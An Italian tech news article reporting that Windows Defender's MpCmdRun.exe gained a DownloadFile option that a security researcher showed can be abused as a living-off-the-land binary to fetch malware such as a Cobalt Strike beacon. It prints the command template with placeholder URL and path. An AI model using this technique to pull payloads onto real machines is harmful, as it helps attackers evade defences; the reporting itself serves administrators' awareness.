Windows Defender si trasforma in un'app pericolosa per gli amministratori

Windows Defender in Windows 10 è la prima linea di difesa in caso di attacchi di malware e fa un anche un bel lavoro.

Tuttavia, in uno dei suoi nuovi aggiornamenti, il potente antivirus ha ricevuto un nuovo comando DownloadFile, che consentirà a chiunque di scaricare qualsiasi file da un URL a un determinato percorso sul tuo computer.

Possiamo definirlo un exploit poiché potrebbe essere utilizzato anche per scaricare malware, una cosa che è stata scoperta dal ricercatore di sicurezza Mohammad Askar che postato la sua scoperta su Twitter.

Come può essere utilizzato Windows Defender per scaricare malware?

È davvero semplice utilizzare l'utilità della riga di comando del servizio Microsoft Antimalware (MpCmdRun.exe) per scaricare qualsiasi file da una fonte esterna sul tuo computer.

MpCmdRun.exe -DownloadFile -url [url] -path [percorso_di_salvataggio_file]

Nel suo tentativo, Askar è stato in grado di scaricare Cobalt Strike beacon, un noto strumento di attacco utilizzando questa riga di comando.

Il nuovo comando è incluso nella versione 4.18.2007.8-0 e oltre, che offre un buon tempo di inizio per gli attaccanti.

Fondamentalmente, questa funzione si trasforma Windows Defender in un LOLBIN (living off the line binari), un file di sistema innocuo che può essere utilizzato per scopi dannosi.

Fortunatamente, dopo aver scaricato il file dannoso, verrà rilevato dallo stesso Windows Defender o da un altro programma antivirus se presente.

Da software di protezione affidabile, Windows Defender si è trasformato in un'altra possibile minaccia che dovrà essere attentamente monitorata da amministratori ed esperti di sicurezza.

Se hai suggerimenti o commenti, lasciali qui sotto nella sezione Commenti.